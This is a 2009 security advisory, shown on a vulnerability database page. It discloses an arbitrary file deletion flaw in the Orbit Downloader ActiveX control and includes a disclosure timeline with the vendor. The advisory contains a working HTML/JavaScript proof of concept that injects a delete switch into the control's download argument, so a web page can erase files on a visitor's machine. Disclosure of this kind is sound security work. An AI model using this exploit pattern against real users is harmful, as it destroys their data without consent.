Vulners
Lucene search
Orbit Downloader 2.8.7 Arbitrary File Deletion Vulnerability
[waraxe-2009-SA#073] - Arbitrary File Deletion in Orbit Downloader <= 2.8.7
===============================================================================
Author: Janek Vind \"waraxe\"
Date: 21. March 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-73.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Orbit Downloader, leader of download manager revolution, is devoted to new
generation web (web2.0) downloading, such as video/music/streaming media from
Myspace, YouTube, Imeem, Pandora, Rapidshare, support RTMP. And to make general
downloading easier and faster.
http://www.orbitdownloader.com/
List of found vulnerabilities
===============================================================================
1. Arbitrary File Deletion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CLSID: {3F1D494B-0CEF-4468-96C9-386E2E4DEC90}
ProgID: Orbitmxt.Orbit
Executable: orbitmxt.dll
File Version: 2.1.0.2
Tested on following platforms:
1. Windows XP Pro SP3/IE 6 SP1
2. Windows Vista Ultimate 64-bit SP1/IE 7
In both cases IE security settings were default for Internet Zone.
Exploitation tests ended successfully without any warnings or other interaction
from Internet Explorer.
Proof Of Concept:
<html><head>
<title>Orbit Downloader &lt;= 2.8.7 Arbitrary File Deletion PoC by waraxe</title>
<script>
function test()
{
waraxe.download(\'\',\'\',\'\" /Lc:\\\\test.txt \"\',\'\',1);
}
</script>
</head><body>
<object
id=\"waraxe\" name=\"waraxe\"
classid=\"CLSID:3F1D494B-0CEF-4468-96C9-386E2E4DEC90\"
width=\"50\" height=\"50\">
</object>
<br><center>
<button onclick=\"javascript:test();\"> Test </button>
</body></html>
For testing first create \"test.txt\" file to the C: root dir and
then use IE and hit test button. \"test.txt\" should be deleted for now :)
Disclosure Timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
03/04/09 Developer contacted
03/04/09 Developer\'s initial response
03/04/09 Findings sent to developer
03/18/09 New version 2.8.7 released, no fix for specific issue!
03/21/09 Public disclosure
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[email protected]
Janek Vind \"waraxe\"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ------------------------------------
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Mar 2009 00:00Current
7.1High risk
Vulners AI Score7.1